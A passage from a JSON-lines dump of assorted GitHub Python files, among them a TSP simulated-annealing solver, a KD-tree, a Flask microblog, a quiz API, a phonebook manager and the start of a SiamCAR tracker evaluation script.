coords\n self.sample_size = len(coords)\n self.temp = config.temp\n self.alpha = config.alpha\n self.stopping_temp = config.stoppingTemp\n self.stopping_iter = config.stoppingIter\n self.iteration = 1\n\n self.dist_matrix = utils.vectorToDistMatrix(coords)\n self.curr_solution = utils.nearestNeighbourSolution(self.dist_matrix)\n self.best_solution = self.curr_solution\n\n self.solutionHistory = [self.curr_solution]\n\n self.curr_weight = self.weight(self.curr_solution)\n self.initial_weight = self.curr_weight\n self.min_weight = self.curr_weight\n\n self.weight_list = [self.curr_weight]\n\n print('Intial weight: ', self.curr_weight)\n\n def weight(self, sol):\n return sum([self.dist_matrix[i, j] for i, j in zip(sol, sol[1:] + [sol[0]])])\n\n def acceptance_probability(self, candidate_weight):\n '''\n Acceptance probability as described in:\n https://stackoverflow.com/questions/19757551/basics-of-simulated-annealing-in-python\n '''\n return math.exp(-abs(candidate_weight - self.curr_weight) / self.temp)\n\n def accept(self, candidate):\n '''\n Accept with probability 1 if candidate solution is better than\n current solution, else accept with probability equal to the\n acceptance_probability()\n '''\n candidate_weight = self.weight(candidate)\n if candidate_weight < self.curr_weight:\n self.curr_weight = candidate_weight\n self.curr_solution = candidate\n if candidate_weight < self.min_weight:\n self.min_weight = candidate_weight\n self.best_solution = candidate\n\n else:\n if random.random() < self.acceptance_probability(candidate_weight):\n self.curr_weight = candidate_weight\n self.curr_solution = candidate\n\n def anneal(self):\n '''\n Annealing process with 2-opt\n described here: https://en.wikipedia.org/wiki/2-opt\n '''\n while self.temp >= self.stopping_temp and self.iteration < self.stopping_iter:\n candidate = list(self.curr_solution)\n l = random.randint(2, self.sample_size - 1)\n i = random.randint(0, self.sample_size - l)\n\n candidate[i: (i + l)] = reversed(candidate[i: (i + l)])\n\n self.accept(candidate)\n self.temp *= self.alpha\n self.iteration += 1\n self.weight_list.append(self.curr_weight)\n self.solutionHistory.append(self.curr_solution)\n\n print('Minimum weight: ', self.min_weight)\n print('Improvement: ',\n round((self.initial_weight - self.min_weight) / (self.initial_weight), 4) * 100, '%')\n\n return [self.coords, self.solutionHistory]\n","repo_name":"shashik5/cnc-code-generator","sub_path":"src/algorithms/simulated_annealing.py","file_name":"simulated_annealing.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73766186476","text":"#label: math difficulty: easy\n\nclass Solution:\n def convertToBase7(self, num: int) -> str:\n base7 = []\n if num < 0:\n flag = 1\n num = -num\n else:\n flag = 0\n while num >= 7:\n fig = str(num % 7)\n base7.append(fig)\n num = num // 7\n base7.append(str(num))\n if flag:\n base7.append('-')\n base7.reverse()\n return ''.join(base7)\n","repo_name":"Aurora-yuan/Leetcode_Python3","sub_path":"0504 七进制数/0504 七进制数.py","file_name":"0504 七进制数.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"35697407516","text":"#Authors: Brad Stephens, John Murray \n#Project: CSC 407 - Program 3 \n#Due: July 19th, 2010\n#File: Room.py\n\nimport random\nfrom Static import *\nfrom Player import *\nfrom Creature_Factory import *\nfrom Weapon_Factory import *\nfrom Armor_Factory import *\nfrom Item_Factory import *\n\nclass Room:\n\n def __init__(self, description, creature=None, item=list(), gold=0):\n #code here\n self.description = description\n self.creature = creature\n self.item = item\n self.gold = gold\n\nclass Room_Factory:\n\n def __init__(self):\n self\n\n #static definition to generate random descriptions\n def get_room_description(self):\n descrip = [\n 'room 1',\n 'room 2',\n 'room 3',\n 'room 4',\n 'room 5',\n 'room 6',\n 'room 7',\n 'room 8',\n 'room 9',\n 'room 10',\n 'room 11',\n 'room 12',\n ]\n \n return descrip[random.randrange(0, len(descrip))]\n\n def generate(self):\n #description item and gold\n description = self.get_room_description()\n gold = random.randrange(101)\n #generate creature\n chance = random.randrange(1000)\n if( chance > 300 ):\n cf = Creature_Factory()\n creature = cf.generate()\n else:\n creature = None\n #generate items\n items = list()\n itf = Item_Factory()\n items.append( itf.generate() )\n wf = Weapon_Factory()\n items.append( wf.generate() )\n af = Armor_Factory()\n items.append( af.generate() )\n return Room( description, creature, items, gold )\n \n \n","repo_name":"JohnMurray/Labyrinth","sub_path":"Room_Module.py","file_name":"Room_Module.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"21807969118","text":"import sys\nimport collections as cl\n\n\ndef main():\n f = open(sys.argv[1] if len(sys.argv) > 1 else 'in')\n lines = [l.rstrip('\\n') for l in f]\n g = get_rating(lines, True)\n e = get_rating(lines, False)\n print(g * e)\n\ndef get_rating(lines, is_most):\n for c in rangelen(lines[0]):\n umpth = get_umpth_common(lines, c, is_most)\n lines = [L for L in lines if L[c] == umpth]\n if len(lines) == 1:\n return int(lines[0], 2)\n\ndef get_umpth_common(lines, column, is_most):\n values = [line[column] for line in lines]\n most_common, count = cl.Counter(values).most_common(1)[0]\n if count * 2 == len(values):\n return str(int(is_most))\n elif is_most:\n return most_common\n else:\n return other(most_common)\n\ndef rangelen(lst):\n return range(len(lst))\n\ndef other(s):\n return '0' if s == '1' else '1'\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"prendradjaja/advent-of-code-2021","sub_path":"03--binary-diagnostic/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"29349610076","text":"import datasets\nfrom pathlib import Path\nimport argparse\n\ndef load(args):\n return datasets.load_dataset(\"cc100\", lang=args.languages, split=\"train\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n \n parser.add_argument('--languages', default='gn', type=str,\n help='Language to finetune on.')\n parser.add_argument('--target_dir', default='./results_nl/', type=Path)\n \n args = parser.parse_args()\n datasets.config.DOWNLOADED_DATASETS_PATH = args.target_dir\n\n load(args)\n","repo_name":"tijmenvanetten/Cross-Lingual-Subnetwork-Analysis","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"17138659128","text":"from datetime import datetime\n\nfrom flask import render_template, flash, url_for, request, current_app\nfrom flask_login import current_user, login_required\nfrom werkzeug.utils import redirect\n\nfrom application import db\nfrom application.auth.forms import EditProfileForm, EmptyForm, PostForm\nfrom application.main import main\nfrom application.models import Users, Posts\n\n\n@main.before_request\ndef before_request():\n if current_user.is_authenticated:\n current_user.last_seen = datetime.utcnow()\n db.session.commit()\n\n\n@main.route('/', methods=['GET', 'POST'])\n@main.route('/index', methods=['GET', 'POST'])\n@login_required\ndef index():\n form = PostForm()\n if form.validate_on_submit():\n post = Posts(body=form.post.data, author=current_user)\n db.session.add(post)\n db.session.commit()\n flash('Your post is now live!')\n return redirect(url_for('index'))\n page = request.args.get('page', 1, type=int)\n posts = current_user.followed_posts().paginate(page, current_app.config['POSTS_PER_PAGE'], False)\n next_url = url_for('.index', page=posts.next_num) if posts.has_next else None\n prev_url = url_for('.index', page=posts.prev_num) if posts.has_prev else None\n return render_template(\"index.html\", title=\"Home page\", form=form, posts=posts.items, next_url=next_url,\n prev_url=prev_url)\n\n\n@main.route('/news', methods=['GET', 'POST'])\n@login_required\ndef news():\n page = request.args.get('page', 1, type=int)\n posts = Posts.query.order_by(Posts.timestamp.desc()).paginate(page, current_app.config['POSTS_PER_PAGE'], False)\n next_url = url_for('.news', page=posts.next_num) if posts.has_next else None\n prev_url = url_for('.news', page=posts.prev_num) if posts.has_prev else None\n return render_template(\"index.html\", title=\"Home page\", posts=posts.items, next_url=next_url,\n prev_url=prev_url)\n\n\n@main.route('/user/')\n@login_required\ndef profile(username):\n user = Users.query.filter_by(username=username).first_or_404()\n page = request.args.get('page', 1, type=int)\n posts = user.posts.order_by(Posts.timestamp.desc()).paginate(page, current_app.config['POSTS_PER_PAGE'], False)\n next_url = url_for('.profile', username=user.username, page=posts.next_num) if posts.has_next else None\n prev_url = url_for('.profile', username=user.username, page=posts.prev_num) if posts.has_prev else None\n form = EmptyForm()\n return render_template('profile.html', user=user, posts=posts.items, form=form, next_url=next_url,\n prev_url=prev_url)\n\n\n@main.route('/edit', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm(current_user.username)\n if form.validate_on_submit():\n current_user.username = form.username.data\n current_user.about = form.about.data\n db.session.commit()\n flash(\"Your changes have been saved!\")\n return redirect(url_for('.profile', username=current_user.username))\n elif request.method == 'GET':\n form.username.data = current_user.username\n form.about.data = current_user.about\n return render_template('edit_profile.html', title='Edit Profile',\n form=form)\n\n\n@main.route('/follow/', methods=['POST'])\n@login_required\ndef follow(username):\n form = EmptyForm()\n if form.validate_on_submit():\n user = Users.query.filter_by(username=username).first()\n if user is None:\n flash(\"User {} not found\".format(username))\n return redirect(url_for('.index'))\n if user == current_user:\n flash(\"You can not follow yourself!\")\n return redirect(url_for('.index', username=username))\n current_user.follow(user)\n db.session.commit()\n flash('You are following {}!'.format(username))\n return redirect(url_for('.profile', username=username))\n else:\n return redirect(url_for('.index'))\n\n\n@main.route('/unfollow/', methods=['POST'])\n@login_required\ndef unfollow(username):\n form = EmptyForm()\n if form.validate_on_submit():\n user = Users.query.filter_by(username=username).first()\n if user is None:\n flash(\"User {} not found\".format(username))\n return redirect(url_for('.index'))\n if user == current_user:\n flash(\"You can not follow yourself!\")\n return redirect(url_for('.index', username=username))\n current_user.unfollow(user)\n db.session.commit()\n flash('You are not following {} anymore!'.format(username))\n return redirect(url_for('.profile', username=username))\n else:\n return redirect(url_for('.index'))\n","repo_name":"rkhimka/microblog","sub_path":"application/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1675350146","text":"class Solution:\n def merge(self, intervals):\n sz = len(intervals)\n result = []\n if (sz == 0):\n return result\n\n # sort the intervals in ascending order of first element\n sorted(intervals, key=lambda x: x[0])\n\n # store the first interval into result\n result.append(intervals[0])\n\n currentInterval = intervals[0]\n\n # use an idx to iterate over intervals\n idx = 0\n\n for interval in intervals:\n # get current intervals end to compare it to interval\n currEnd = currentInterval[1]\n nextBegin = interval[0]\n nextEnd = interval[1]\n # if the next interval start is less than current intervals end, there is overlap\n if currEnd >= nextBegin:\n currentInterval[1] = max(currEnd, nextEnd)\n result[idx][1] = currentInterval[1]\n else:\n # set the current interval to interval since there is no overlap\n currentInterval = interval\n result.append(currentInterval)\n idx += 1\n result\n\n\ndef main():\n mySol = Solution()\n nums = [[1, 3], [2, 6], [8, 10], [15, 18], [16, 21]]\n result = mySol.merge(nums)\n print(\"Merged intervals for the given intervals \" +\n str(nums) + \" are \" + str(result))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"karan2808/Python-Data-Structures-and-Algorithms","sub_path":"Arrays/MergeIntervals.py","file_name":"MergeIntervals.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"28248057693","text":"n=int(input())\r\nl=list(map(int,input().split()))\r\nl+=list(map(int,input().split()))\r\nl=list(set(l))\r\nl.sort()\r\nif(l[0]==0):\r\n l=l[1:]\r\n\r\n#print(l,list(range(1,n+1)))\r\nif(l==list(range(1,n+1))):\r\n print(\"I become the guy.\")\r\nelse:\r\n print(\"Oh, my keyboard!\")\r\n","repo_name":"venkat-12345/CodeForces","sub_path":"Code force/I wanna be the guy.py","file_name":"I wanna be the guy.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16758276906","text":"import math\nimport numpy as np\nfrom binarytree import tree, Node\n\n# pandas version: https://www.youtube.com/watch?v=HWzyEslmSOg&t=113s\n\nclass generalNode:\n def __init__(self, val, left, right) -> None:\n self.val = val\n self.left = left\n self.right = right\n\nclass KDNode(Node):\n def __init__(self, _id, data, idx=0, left = None, right = None) -> None:\n super().__init__(_id)\n #self.value = _id\n self.data = data # value is a tuple or list\n self.idx = idx\n self.left = left\n self.right = right\n\nclass KDTree:\n\n def __init__(self, data) -> None:\n self.data = data\n self.root = None\n self.K = len(data[0]) if len(data) else 0\n\n def chooseBest(self, target, node1, node2):\n dist1 = self.dist(target, node1)\n dist2 = self.dist(target, node2)\n \n if dist1 <= dist2:\n return node1, dist1\n else:\n return node2, dist2\n\n def dist(self, target, node):\n if not node:\n return float(\"inf\")\n\n return sum((i-j)**2 for i, j in zip(target, node.data))\n\n def find_NN(self, node, target, depth=0):\n \n if node is None:\n return None, float(\"inf\")\n\n K = self.K\n idx = depth % K\n if target[idx] > node.data[idx]:\n next = node.right\n drop = node.left\n else:\n next = node.left\n drop = node.right\n\n sub, sub_dist = self.find_NN(next, target, depth + 1)\n best, best_dist = self.chooseBest(target, sub, node)\n\n if target[idx] - node.data[idx] < best_dist:\n sub2, sub_dist = self.find_NN(drop, target, depth + 1)\n best, best_dist = self.chooseBest(target, best, sub2)\n\n return best, best_dist\n\n def _build(self, data, depth, K):\n\n L = len(data)\n if L == 0:\n return None\n mid = L // 2\n data.sort(axis = depth%K) #data.sort(key = lambda x:x[depth%K])\n ind = np.lexsort(data[:, depth%K],)\n # ind = np.argsort(data[:, depth%K])\n data = data[ind]\n\n \"\"\"\n _col = data.columns[depth%k]\n obj_lst = data.sort_values(by = [_col], ascending=True)\n node = KDNode(obj_lst.iloc[mid], idx = mid)\n node.left = self._build(obj_lst.iloc[:mid], depth=depth+1)\n node.right = self._build(obj_lst.iloc[mid+1:], depth=depth+1)\n \"\"\"\n\n node = KDNode(int(data[mid][depth%K]), data[mid], depth%K)\n node.left = self._build(data[:mid], depth+1, K)\n node.right = self._build(data[mid+1:], depth+1, K)\n\n return node\n\n def build(self):\n self.root = self._build(self.data, depth=0, K=len(self.data[0]))\n\n\ndef check(target, data):\n \"\"\"\n Compute dists betwwen target and all the data points\n Parameters:\n -----------\n target: (M,)\n data: (N, M)\n Returns:\n --------\n lst_dists: (N, )\n List of distance between target and all the data points.\n \"\"\"\n\n if isinstance(target, list):\n target = np.array(target, dtype = np.float16)\n\n return np.linalg.norm(target - data, axis = 1)\n\n\ntarget = [6,7,3,9,2]\ndata = np.random.randint(0,20,[10,5])\n# data = [[2,3, 5],[5,4,2],[4,7,0],[8,1,9],[9,6,7],[7,2,4]]\nkd_tree = KDTree(data)\nkd_tree.build()\nprint(kd_tree.root)\n\nbest, best_dist = kd_tree.find_NN(kd_tree.root, target)\nres = check(target, data)\ncheck_res = data[np.argmin(res, axis = 0)]\n\nprint(\"knn result matches checked result\") if np.equal(check_res, best.data).all() else print(\"knn doesn't get the optimal result.\")\n\n","repo_name":"jiayi-xian/coding","sub_path":"leetcode_codes/KD_tree.py","file_name":"KD_tree.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"29477274785","text":"# coding=utf-8\n# Author: Rion B Correia\n# Date: July 08, 2019\n#\n# Description: Reads GOAE results for each module and plots results\n#\n#\nimport math\nimport numpy as np\nimport pandas as pd\npd.set_option('display.max_rows', 100)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\nfrom utils import ensurePathExists\nimport matplotlib as mpl\nmpl.rcParams['font.family'] = 'Helvetica'\nmpl.rcParams['mathtext.fontset'] = 'cm'\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n#\nfrom wordcloud import WordCloud\nfrom nltk.corpus import stopwords\n\n\ndef plot_goea(celltype='spermatocyte', layer='DM'):\n\n rCSVFile = 'results/goea-{network:s}-{layer:s}.csv'.format(network=network, layer=layer)\n df = pd.read_csv(rCSVFile)\n\n # Trim\n df = df.loc[(df['depth'] >= 5), :]\n\n # All zeros are set to the smallest computable float\n df.loc[df['p_fdr_bh'] == 0.0, 'p_fdr_bh'] = np.nextafter(0, 1)\n #\n df['1-log(p)'] = 1 - (np.log(df['p_fdr_bh']))\n dft10 = df.iloc[:10, :].sort_values('1-log(p)', ascending=True)\n sl = 75 # string slice\n dft10['name'] = dft10['name'].apply(lambda x: x[0:sl] + '..' if len(x) > sl else x)\n\n # Plot\n fig, ax = plt.subplots(figsize=(4.7, 3.0))\n\n # P-values\n title = 'GOEA-{network:s}'.format(network=network)\n\n ind = np.arange(0, len(dft10), 1)\n bp = ax.barh(ind, 1 - np.log(dft10['p_fdr_bh']), height=0.8, facecolor=facecolor, zorder=4)\n ax.set_title(title, fontsize='large')\n\n minx, maxx = ax.get_xlim()\n for bar, name in zip(bp.patches, dft10['name'].tolist()):\n bx = bar.get_x()\n by = bar.get_y()\n bh = bar.get_height()\n # bw = bar.get_width()\n tx = bx + (0.01 * maxx)\n ty = (by + (bh / 2))\n ax.text(x=tx, y=ty, s=name, ha='left', va='center', fontsize='x-small', zorder=5)\n #\n #ax.axvline(x=(1 - math.log(0.01)), color='#666666', ls='dotted')\n ax.axvline(x=(1 - math.log(0.05)), color='#c7c7c7', ls='dashed')\n ax.set_yticks(ind)\n ax.set_yticklabels(dft10['GO'])\n ax.set_xlabel(r'$1 - $log($p$-value)')\n ax.set_ylim(-0.7, (10 - 0.3))\n ax.grid(axis='x', zorder=1)\n\n plt.subplots_adjust(left=0.21, right=0.97, bottom=0.17, top=0.89)\n #plt.tight_layout()\n #\n wIMGFile = 'images/img-goea-bars-{network:s}-{layer:s}.pdf'.format(network=network, layer=layer)\n ensurePathExists(wIMGFile)\n plt.savefig(wIMGFile, dpi=300, bbox_inches=None, pad_inches=0.0)\n plt.close()\n\n\nif __name__ == '__main__':\n\n network = 'rnf113' # 'thr'\n layer = 'HS'\n\n dict_specie = {'HS': 'Human', 'MM': 'Mouse', 'DM': 'Insect'}\n facecolor = '#ffbb78'\n\n data_text_color = {\n 1: ['ubiquitination', 'ubiquitin'],\n 2: ['splicing'],\n 3: ['translation', 'translational', 'cotranslational'],\n 4: ['rRNA'],\n 5: ['vesicle', 'transport'],\n 6: ['respiration', 'respiratory', 'electron'],\n 7: ['cell', 'cycle'],\n 8: ['DNA', 'repair'],\n 9: ['mitochondrial', 'translation', 'translational'],\n 10: ['cell', 'cycle'],\n 11: ['metabolic'],\n 12: ['histidine', 'peptidyl', 'dephosphorylation'],\n }\n\n plot_goea(network, layer)\n","repo_name":"rionbr/meionav","sub_path":"05-data-analysis/gene-prp13-exploration/05-plot-goea.py","file_name":"05-plot-goea.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"5324345910","text":"from profiler import profile\n\n\ndef list_in(a, b):\n return [x in b for x in a]\n\n\ndef set_in(a, b):\n s = set(b)\n return [x in s for x in a]\n\n\nmethods = [list_in, set_in]\nfig = profile(methods)\nfig.tight_layout();\nfig.savefig('first_figure.png')","repo_name":"amanlai/stack-overflow-answers","sub_path":"pure-python/check-values-exist-in-list/first_figure.py","file_name":"first_figure.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"15930690259","text":"from tkinter import *\n\nfrom langcodes import *\n\nfrom langdetect import detect\n\nroot = Tk()\n\nroot.title(\"Language Detector using module \\\"langdetect\\\" By @SmashdFrenzy16\")\n\ndetector = Entry(root, width=100, borderwidth=5)\ndetector.pack()\ndetector.insert(0, \"Enter Unknown Language\")\n\ndef execute():\n\n\n detecting = detect(detector.get())\n \n final = Language.make(language = detecting).display_name()\n\n answerlabel = Label(root, text=final)\n answerlabel.pack()\n\nenter = Button(root, text=\"Enter\", command=execute)\nenter.pack()\n\nroot.mainloop()\n","repo_name":"SmashedFrenzy16/Unknown-Language-Detector","sub_path":"Detectors/langdetect_detector.py","file_name":"langdetect_detector.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"28582879457","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.naive_bayes import MultinomialNB\nimport sys\n\nMIN = '1'\n\nclf = MultinomialNB(alpha=1.0, class_prior=None, fit_prior=True)\ndef NaiveBayes(TRAIN, TEST):\n X = TRAIN.iloc[:,:TRAIN.shape[1]-1].values # 配列に変換 ('label'を除く)\n y = TRAIN['label'].values # ラベル抽出\n X_t = TEST.iloc[:,:TEST.shape[1]-1].values\n y_t = TEST['label'].values\n clf.fit(X, y) # 学習する\n result = clf.predict(X_t) # 予測する\n df_result = pd.DataFrame(result)\n df_result.to_csv('./Plot/result_' + MIN + 'min.csv', index=False)\n # print(\"精度 -> %f\" % (np.sum(result==y_t)/TEST.shape[0]))\n\n# データを読み込んで,シャッフルする\ndf_train = pd.read_csv('./TrainingData/' + MIN + 'min_train.csv', dtype='int16')\ndf_test = pd.read_csv('./TrainingData/' + MIN + 'min_test.csv', dtype='int16')\nNaiveBayes(df_train, df_test)\n","repo_name":"Takuya-FUJITA/cuda_backup","sub_path":"NB/Connect_Time/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5781998141","text":"import os\nimport sys\n\nfile_dir = os.path.dirname(__file__)\nsys.path.append(file_dir)\n\nimport json\nimport uuid\nimport collections\nfrom flask import jsonify\nfrom Quiz import Quiz\n\nclass Question:\n\n\tdef path_to_file_question(self):\n\t\twith open('config.json', 'r') as file:\n\t\t\tfile = json.load(file)\n\t\treturn file[\"questions_path\"]\n\t\n\tdef read_question_file(self):\n\t\tpath_to_file = self.path_to_file_question()\n\t\twith open(path_to_file, 'r') as json_file:\n\t\t\tquestions_json_file = json.load(json_file)\n\t\treturn questions_json_file\n\n\tdef write_questions_json_file(self, questions_json_file):\n\t\tpath_to_file = self.path_to_file_question()\n\t\twith open(path_to_file, 'w') as file_question:\n\t\t\tjson.dump(questions_json_file, file_question)\n\n\tdef show_question(self, question_id):\n\t\ttry:\n\t\t\tquestion_file = self.read_question_file()\n\t\t\tfor dic_quest in question_file:\n\t\t\t\tif dic_quest['id'] == question_id:\n\t\t\t\t\treturn jsonify({\n\t\t\t\t\t\t'id': dic_quest['id'],\n\t\t\t\t\t\t'name': dic_quest['name'],\n\t\t\t\t\t\t'options': dic_quest['options'],\n\t\t\t\t\t\t'correct_option':dic_quest['correct_option'],\n\t\t\t\t\t\t'quiz':dic_quest['quiz'],\n\t\t\t\t\t\t'points': dic_quest['points']\n\t\t\t\t\t}), 200\n\t\t\treturn {}, 404\n\t\texcept:\n\t\t\treturn jsonify({\n 'status': 'failure',\n 'reason': 'Something went wrong'\n }), 400\n\t\n\tdef get_all_questions_for_quizid(self, quiz_id):\n\t\tquestions_list = []\n\t\tquestion_file = self.read_question_file()\n\t\tfor question in question_file:\n\t\t\tif question['quiz'] == quiz_id:\n\t\t\t\tquestions_list.append(question)\n\t\tif len(questions_list) == 0:\n\t\t\treturn {}, 404\n\t\tquiz = Quiz().get_quiz(quiz_id)\n\t\treturn jsonify({\n\t\t\t'name': quiz['name'],\n\t\t\t'description': quiz['description'],\n\t\t\t'questions': questions_list\n\t\t}), 200\n\n\tdef create_question(self, que_input):\n\t\tque_input['id'] = int(uuid.uuid4())\n\t\tfor key in [\"name\", \"options\", \"correct_option\", \"quiz\", \"points\"]:\n\t\t\tif key not in que_input:\n\t\t\t\treturn jsonify({\n\t\t\t\t\t'status': 'failure',\n 'reason': 'Input is not correct'\n\t\t\t\t}), 400\n\t\tif (Quiz().check_if_quiz_exists(que_input['quiz']) == False):\n\t\t\treturn jsonify({\n\t\t\t\t'status': 'failure',\n\t\t\t\t'reason': \"Quiz Key doesn't exist\"\n\t\t\t}), 400\n\t\t\t\n\t\tque_json_file = self.read_question_file()\n\t\tque_json_file.append(que_input)\n\t\tself.write_questions_json_file(que_json_file)\n\t\treturn jsonify({\n 'id': que_input['id'],\n\t\t\t'name': que_input['name'],\n\t\t\t'options': que_input['options'],\n\t\t\t'correct_option':que_input['correct_option'],\n\t\t\t'quiz':que_input['quiz'],\n\t\t\t'points': que_input['points']\n }), 201","repo_name":"revive-k/FlaskDemo","sub_path":"api/Question.py","file_name":"Question.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5566254764","text":"import data_base as db\r\nfrom parameters import name_file_db\r\n\r\ndef init_db():\r\n return db.read_element(name_file_db)\r\n\r\n# получение записи строки в виде списка без печати\r\ndef get_element_list(position_in_list: int) -> list:\r\n list_phone = init_db()\r\n return list_phone[position_in_list].split(' ' + ';' + ' ')\r\n\r\n# список печатаем красиво\r\ndef view_list(list_phone: list) -> str:\r\n data = ''\r\n for i in range(len(list_phone)):\r\n if i < len(list_phone) - 1:\r\n data += str(list_phone[i]) + ' | '\r\n else:\r\n data += str(list_phone[i]) + ' | ' + '\\n'\r\n #[print(list_phone[i], ' | ', end=' ') if i < len(list_phone) - 1 else print(list_phone[i], ' | ', '\\n') for i in range(len(list_phone)) ]\r\n return data\r\n\r\n# # заглавия колонок\r\ndef column_header():\r\n print(view_list(['Фамилия','Имя','Телефон','Пометка']))\r\n \r\n# смотрим всю базу\r\ndef view_all_list():\r\n list_phone = init_db()\r\n column_header() # через заглавия колонок\r\n [print(view_list(get_element_list(i))) for i in range(len(list_phone))] \r\n \r\n\r\n# добавляем и меняем записи\r\ndef add_record_in_list_universal() -> str:\r\n return str(input('Введите фамилию: ')) + ' ; ' + str(input('Введите имя: ')) + ' ; ' + str(input('Введите телефон: ')) + ' ; ' + str(input('Пометка: ')) + '\\n'\r\n\r\n# добавляем\r\ndef add_record_in_list():\r\n data = add_record_in_list_universal()\r\n db.write_element('a', data, name_file_db)\r\n print('Запись добавлена!') \r\n\r\n# ищем по ключевому\r\ndef enter_key_word() -> str:\r\n return str(input('Введите слово для поиска: '))\r\n\r\n# удаляем по ключевому\r\ndef delete_record_in_list() -> db.write_element:\r\n list_phone = init_db()\r\n key_word = enter_key_word()\r\n result = ''\r\n for i in range(len(list_phone)):\r\n entry = get_element_list(i)\r\n for j in entry:\r\n find_word = False\r\n if key_word in j:\r\n find_word = True\r\n column_header()\r\n print(view_list(['Фамилия','Имя','Телефон','Пометка']))\r\n print(view_list(entry))\r\n for_delete = 'Да'\r\n for_delete = str(input('Хотите удалить запись? (Да/Нет):'))\r\n if for_delete == 'Да' or for_delete == \"\":\r\n print(\"Запись удалена!\") \r\n break\r\n if find_word == False:\r\n result += \" ; \".join(entry) + '\\n'\r\n db.write_element('w', result, name_file_db)\r\n\r\n# ищем запись в базе\r\ndef find_record_in_list():\r\n list_phone = init_db()\r\n key_word = enter_key_word()\r\n result = ''\r\n for i in range(len(list_phone)):\r\n entry = get_element_list(i)\r\n for j in entry:\r\n find_word = False\r\n if key_word in j:\r\n find_word = True\r\n # column_header()\r\n print(view_list(['Фамилия','Имя','Телефон','Пометка']))\r\n print(view_list(entry))\r\n #break\r\n\r\n# редактируем запись по ключевому\r\ndef editing_record_in_list() -> db.write_element:\r\n list_phone = init_db()\r\n key_word = enter_key_word()\r\n result = ''\r\n for i in range(len(list_phone)):\r\n entry = get_element_list(i)\r\n for j in entry:\r\n find_word = False\r\n if key_word in j:\r\n find_word = True\r\n # column_header()\r\n print(view_list(['Фамилия','Имя','Телефон','Пометка']))\r\n print(view_list(entry))\r\n for_delete = 'Да'\r\n for_delete = str(input('Хотите отредактировать? (Да/нет):'))\r\n if for_delete == 'Да' or for_delete == \"\":\r\n result += add_record_in_list_universal()\r\n print(\"Запись отредактирована!\") \r\n break\r\n if find_word == False:\r\n result += \" ; \".join(entry) + '\\n'\r\n db.write_element('w', result, name_file_db)","repo_name":"Garde2/python3673","sub_path":"phonabase/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"25679436026","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport os\nimport subprocess\n\nimport cv2\nimport torch\nimport numpy as np\nimport math\nimport sys\nimport shutil\nsys.path.append('../')\n\nfrom pysotcar.core.config import cfg\nfrom pysotcar.tracker.siamcar_tracker import SiamCARTracker\nfrom pysotcar.utils.bbox import get_axis_aligned_bbox\nfrom pysotcar.utils.model_load import load_pretrain\nfrom pysotcar.models.model_builder import ModelBuilder\nfrom toolkit.utils.region import vot_overlap, vot_float2str\n\nfrom toolkit.datasets import DatasetFactory\n\nparser = argparse.ArgumentParser(description='siamcar tracking')\nparser.add_argument('--video', default='', type=str, help='eval one special video')\nparser.add_argument('--dataset', type=str, default='UAV123', help='datasets')\nparser.add_argument('--vis', action='store_true', default=False, help='whether visualzie result')\nparser.add_argument('--snapshot', type=str, default='snapshot/checkpoint_e20.pth',\n help='snapshot of models to eval')\nparser.add_argument('--config', type=str,\n default='../experiments/siamcar_r50/config.yaml', help='config file')\nparser.add_argument('--case', type=int, required=True)\nparser.add_argument('--model_iter', type=str, required=True)\nparser.add_argument('--eps', type=int, required=True)\nparser.add_argument('--attack_universal', default=False, action='store_true',\n help='whether visualzie result')\nargs = parser.parse_args()\n\ntorch.set_num_threads(1)\n\n\nckpt_root_dir = '../../SiamRPNpp'\n\n\ndef load_generator():\n\n # OURS\n if 1:\n\n attack_method = 'TTA'\n import sys\n sys.path.insert(0, ckpt_root_dir + 